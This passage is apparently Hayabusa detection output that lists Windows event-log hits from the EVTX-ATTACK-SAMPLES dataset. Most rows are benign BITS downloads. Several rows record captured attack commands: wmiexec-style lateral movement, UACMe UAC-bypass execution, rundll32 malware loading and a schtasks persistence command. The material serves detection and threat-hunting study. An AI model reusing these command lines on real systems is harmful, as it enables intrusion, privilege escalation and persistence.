+09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-18 07:37:53.664 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-18 07:37:53.771 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-18 07:37:53.807 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-18 07:37:53.867 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-18 07:37:53.928 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-18 07:53:05.436 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cmd.exe /Q /c cd \ 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\Administrator : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx -2020-10-18 07:53:05.436 +09:00,MSEDGEWIN10,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx -2020-10-18 07:53:05.676 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cmd.exe /Q /c cd 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\Administrator : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx -2020-10-18 07:53:05.676 +09:00,MSEDGEWIN10,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx -2020-10-18 07:53:05.777 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd.exe /Q /c c:\windows\system32\rundll32.exe c:\programdata\7okjer,#1 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\Administrator : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx -2020-10-18 07:53:05.777 +09:00,MSEDGEWIN10,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx -2020-10-20 20:50:54.810 +09:00,DESKTOP-NTSSLJD,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1059.001,technique_name=PowerShell : Command: ""C:\Users\den\Source\Repos\UACME\Source\Akagi\output\x64\Release\Akagi64.exe"" 64 : Path: C:\Users\den\Source\Repos\UACME\Source\Akagi\output\x64\Release\Akagi64.exe : User: DESKTOP-NTSSLJD\den : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx -2020-10-20 20:50:54.810 +09:00,DESKTOP-NTSSLJD,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx -2020-10-20 20:50:55.450 +09:00,DESKTOP-NTSSLJD,11,high,UAC Bypass Using IEInstal - File,,rules/sigma/file_event/sysmon_uac_bypass_ieinstal.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx -2020-10-20 20:50:56.490 +09:00,DESKTOP-NTSSLJD,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1036,technique_name=Masquerading : Command: C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe : Path: C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe : User: DESKTOP-NTSSLJD\den : Parent Command: ""C:\Program Files\Internet Explorer\IEInstal.exe"" -Embedding",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx -2020-10-20 20:50:56.490 +09:00,DESKTOP-NTSSLJD,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx -2020-10-20 20:50:56.490 +09:00,DESKTOP-NTSSLJD,1,high,UAC Bypass Using IEInstal - Process,,rules/sigma/process_creation/win_uac_bypass_ieinstal.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx -2020-10-20 20:50:56.569 +09:00,DESKTOP-NTSSLJD,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1059.003,technique_name=Windows Command Shell : Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: DESKTOP-NTSSLJD\den : Parent Command: C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx -2020-10-21 07:33:02.063 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\wermgr.exe : Path: C:\Windows\System32\wermgr.exe : User: MSEDGEWIN10\IEUser : Parent Command: rundll32.exe c:\temp\winfire.dll,DllRegisterServer",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_hollowing_wermgr_masquerading.evtx -2020-10-21 07:33:02.063 +09:00,MSEDGEWIN10,1,critical,Trickbot Malware Activity,,rules/sigma/process_creation/win_malware_trickbot_wermgr.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_hollowing_wermgr_masquerading.evtx -2020-10-21 07:33:02.064 +09:00,MSEDGEWIN10,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_hollowing_wermgr_masquerading.evtx -2020-10-21 07:35:26.755 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding : Path: C:\Windows\System32\wbem\WmiPrvSE.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_hollowing_wermgr_masquerading.evtx -2020-10-24 06:55:59.769 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: C:\Users\IEUser\AppData\Local\Temp\{2015B2D1-1706-42F6-8C0E-8BEECB408D48}-86.0.4240.111_86.0.4240.75_chrome_updater.exe : URL: http://r2---sn-5hnekn7z.gvt1.com/edgedl/release2/chrome/E4_ltUMmNI-KvJYPRyaXng_86.0.4240.111/86.0.4240.111_86.0.4240.75_chrome_updater.exe?cms_redirect=yes&mh=3q&mip=213.127.65.23&mm=28&mn=sn-5hnekn7z&ms=nvh&mt=1603490058&mv=m&mvi=2&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-24 06:57:29.217 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding : Path: C:\Windows\System32\wbem\WmiPrvSE.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx -2020-10-24 06:57:36.014 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\rundll32.exe"" conf3234.dll f8753 d948 : Path: C:\Windows\SysWOW64\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: c:\Users\Public\test.tmp ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx -2020-10-24 06:57:36.399 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /C schtasks /Create /f /XML C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp /TN DataUsageHandlers : Path: C:\Windows\SysWOW64\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\rundll32.exe"" conf3234.dll f8753 d948",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx -2020-10-24 06:57:36.631 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: schtasks /Create /f /XML C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp /TN DataUsageHandlers : Path: C:\Windows\SysWOW64\schtasks.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C schtasks /Create /f /XML C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp /TN DataUsageHandlers",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx -2020-10-24 06:57:36.631 +09:00,MSEDGEWIN10,1,low,Scheduled Task Creation,,rules/sigma/process_creation/win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx -2020-10-24 06:57:36.631 +09:00,MSEDGEWIN10,1,high,Suspicius Add Task From User AppData Temp,,rules/sigma/process_creation/win_pc_susp_schtasks_user_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx -2020-10-24 06:58:17.176 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222 : Path: C:\Windows\System32\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: ?",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx -2020-10-24 06:58:17.176 +09:00,MSEDGEWIN10,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx -2020-10-24 06:58:17.543 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\SysWOW64\rundll32.exe"" ""C:\Windows\SysWOW64\shell32.dll"",#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222 : Path: C:\Windows\SysWOW64\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx -2020-10-24 06:58:17.543 +09:00,MSEDGEWIN10,1,high,Suspicious Call by Ordinal,,rules/sigma/process_creation/win_susp_rundll32_by_ordinal.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx -2020-10-24 06:58:21.695 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222 : Path: C:\Windows\SysWOW64\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\SysWOW64\rundll32.exe"" ""C:\Windows\SysWOW64\shell32.dll"",#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx -2020-10-24 06:58:22.066 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\rundll32.exe"" DATAUS~1.DLL f8755 4624665222 rd : Path: C:\Windows\SysWOW64\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx -2020-10-24 22:15:50.672 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Font Download : URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-24 22:53:41.949 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1amaWj.img?w=100&h=100&m=6&tilesize=medium&x=1912&y=840&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-24 22:53:43.173 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161342140454_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-24 23:25:16.281 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-24 23:25:17.595 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-25 00:07:57.551 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1amczd.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-25 00:07:57.815 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161342140454_Images/LiveTileImages/MediumAndLarge/Image2.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-25 05:37:35.394 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1amg5S.img?w=100&h=100&m=6&tilesize=medium&x=2238&y=680&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-27 19:17:18.397 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: "".\samir.exe"" : Path: C:\Users\bouss\Downloads\samir.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: ProcessHerpaderping.exe ""c:\Program Files\Internet Explorer\iexplore.exe"" .\samir.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_ProcessHerpaderping_Sysmon_11_10_1_7.evtx -2020-10-27 19:17:18.397 +09:00,LAPTOP-JU4M3I0E,1,medium,Suspicious File Characteristics Due to Missing Fields,,rules/sigma/process_creation/win_susp_file_characteristics.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_ProcessHerpaderping_Sysmon_11_10_1_7.evtx -2020-11-02 03:28:53.729 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Font Download : URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-02 03:30:10.144 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-02 03:30:10.448 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-02 03:30:10.667 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: SetupBinary : URL: https://oneclient.sfx.ms/Win/Prod/20.169.0823.0008/OneDriveSetup.exe,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-02 03:30:11.059 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: SetupBinary : URL: https://oneclient.sfx.ms/Win/Prod/20.169.0823.0008/OneDriveSetup.exe,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-02 03:33:01.610 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-05 19:55:56.114 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: C:\Users\IEUser\AppData\Local\Temp\{DE1AA2CB-2733-420D-BD53-D15E1761ED0D}-86.0.4240.183_86.0.4240.111_chrome_updater.exe : URL: http://r2---sn-5hnekn7d.gvt1.com/edgedl/release2/chrome/APOVneiKVAxsNCc0oAg3ibQ_86.0.4240.183/86.0.4240.183_86.0.4240.111_chrome_updater.exe?cms_redirect=yes&mh=T1&mip=213.127.67.78&mm=28&mn=sn-5hnekn7d&ms=nvh&mt=1604573655&mv=m&mvi=2&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-05 19:59:25.802 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-05 19:59:51.480 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-05 20:03:04.083 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aHmh2.img?w=100&h=100&m=6&tilesize=medium&x=2005&y=1451&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-05 20:03:05.093 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161342940453_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-05 20:03:06.197 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: http://blob.weather.microsoft.com:80/static/mws-new/WeatherImages/210x173/29.jpg?a,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-05 21:31:12.664 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-05 21:31:12.941 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-05 21:33:21.719 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aFbhf.img?w=100&h=100&m=6&tilesize=medium&x=2920&y=321&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-06 00:25:28.955 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aIYx8.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-06 00:25:30.216 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161342940453_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-06 19:52:28.687 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aKxpG.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-06 23:56:52.824 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-08 00:33:50.498 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19R5M0.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-08 00:36:30.267 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-08 00:36:30.760 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-09 17:25:00.043 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Font Download : URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and 